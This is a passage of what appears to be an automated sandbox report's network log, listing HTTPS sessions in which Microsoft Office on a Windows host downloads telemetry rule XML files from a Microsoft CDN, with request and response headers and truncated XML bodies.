                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            95 | 192.168.2.4 | 49848 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 192 | OUT | GET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:35 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1352
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                            ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                            x-ms-request-id: 174e4ed1-f01e-0052-3d1b-279224000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181235Z-r1755647c66hxv26qums8q8fsw00000003h0000000006y6u
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 1352 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            96 | 192.168.2.4 | 49849 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 192 | OUT | GET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:35 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                            ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                            x-ms-request-id: 4e087ea8-e01e-0099-0e5a-28da8a000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181235Z-r1755647c66hxv26qums8q8fsw00000003e000000000e4s8
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:35 UTC | 1405 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            97 | 192.168.2.4 | 49850 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:36 UTC | 192 | OUT | GET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:36 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:36 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                            ETag: "0x8DC582BDDC22447"
                                                                                                                                                                            x-ms-request-id: 5ec9f71f-c01e-0082-7a31-26af72000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181236Z-r1755647c6688lj6g0wg0rqr1400000005p0000000003prt
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:36 UTC | 1368 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            98 | 192.168.2.4 | 49851 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:36 UTC | 192 | OUT | GET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:36 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:36 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                            ETag: "0x8DC582BE055B528"
                                                                                                                                                                            x-ms-request-id: 816a6405-301e-001f-06d8-21aa3a000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181236Z-17fbfdc98bbwj6cp6df5812g4s00000006wg00000000abkn
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:36 UTC | 1401 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            99 | 192.168.2.4 | 49852 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:36 UTC | 192 | OUT | GET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:36 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:36 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                            ETag: "0x8DC582BE1223606"
                                                                                                                                                                            x-ms-request-id: eff8debc-001e-0065-199c-270b73000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181236Z-r1755647c66vwt2b5wfzb6a204000000020000000000f6f8
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:36 UTC | 1364 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            100 | 192.168.2.4 | 49854 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:36 UTC | 192 | OUT | GET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:36 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:36 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                            ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                            x-ms-request-id: 08154944-901e-0083-2112-29bb55000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181236Z-17fbfdc98bbwj6cp6df5812g4s00000006w000000000cttc
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:36 UTC | 1360 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            101 | 192.168.2.4 | 49853 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:36 UTC | 192 | OUT | GET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:37 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:36 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                            ETag: "0x8DC582BE7262739"
                                                                                                                                                                            x-ms-request-id: c21b1165-c01e-008e-596f-287381000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181236Z-17fbfdc98bbfmg5wrf1ctcuuun00000005v00000000037ww
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:37 UTC | 1397 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            102 | 192.168.2.4 | 49855 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:36 UTC | 192 | OUT | GET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:37 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:36 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                            ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                            x-ms-request-id: 672cac94-f01e-00aa-27b2-268521000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181236Z-r1755647c66t77qv3m6k1gb3zw0000000550000000000beg
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:37 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            103 | 192.168.2.4 | 49856 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:37 UTC | 192 | OUT | GET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:37 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:37 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                            ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                            x-ms-request-id: ead33fc5-401e-0029-0967-289b43000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181237Z-r1755647c66qg7mpa8m0fzcvy000000006gg00000000cpnb
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:37 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            104 | 192.168.2.4 | 49857 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:37 UTC | 192 | OUT | GET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:37 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:37 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                            ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                            x-ms-request-id: 4bfb087f-501e-008f-4c9c-279054000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181237Z-17fbfdc98bbngfjxtncsq24exs000000074g000000006mu5
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:37 UTC | 1397 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            105 | 192.168.2.4 | 49858 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:37 UTC | 192 | OUT | GET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:38 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:37 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                            ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                            x-ms-request-id: 92d64d37-101e-0034-119c-2796ff000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181237Z-r1755647c66tsn7nz9wda692z000000003tg000000004wem
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:38 UTC | 1360 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            106 | 192.168.2.4 | 49860 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:37 UTC | 192 | OUT | GET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:38 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:37 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1427
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                            ETag: "0x8DC582BE56F6873"
                                                                                                                                                                            x-ms-request-id: 0c5aa6f6-c01e-000b-5d92-25e255000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181237Z-r1755647c66f4bf880huw27dwc00000006u0000000002y8g
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:38 UTC | 1427 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


Session ID | Source IP | Source Port | Destination IP | Destination Port
107 | 192.168.2.4 | 49859 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:37 UTC | 192 | OUT | GET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:38 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:38 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1390
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                            ETag: "0x8DC582BE3002601"
                                                                                                                                                                            x-ms-request-id: 903d1aff-701e-0050-019c-276767000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181238Z-r1755647c666s72wx0z5rz6s6000000006bg00000000f79g
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:38 UTC | 1390 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


Session ID | Source IP | Source Port | Destination IP | Destination Port
108 | 192.168.2.4 | 49861 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:38 UTC | 192 | OUT | GET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:38 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:38 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                            ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                            x-ms-request-id: 3a798620-501e-00a0-0295-279d9f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181238Z-r1755647c666s72wx0z5rz6s6000000006h0000000001fkp
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:38 UTC | 1401 | IN
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


Session ID | Source IP | Source Port | Destination IP | Destination Port
109 | 192.168.2.4 | 49862 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:38 UTC | 192 | OUT | GET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
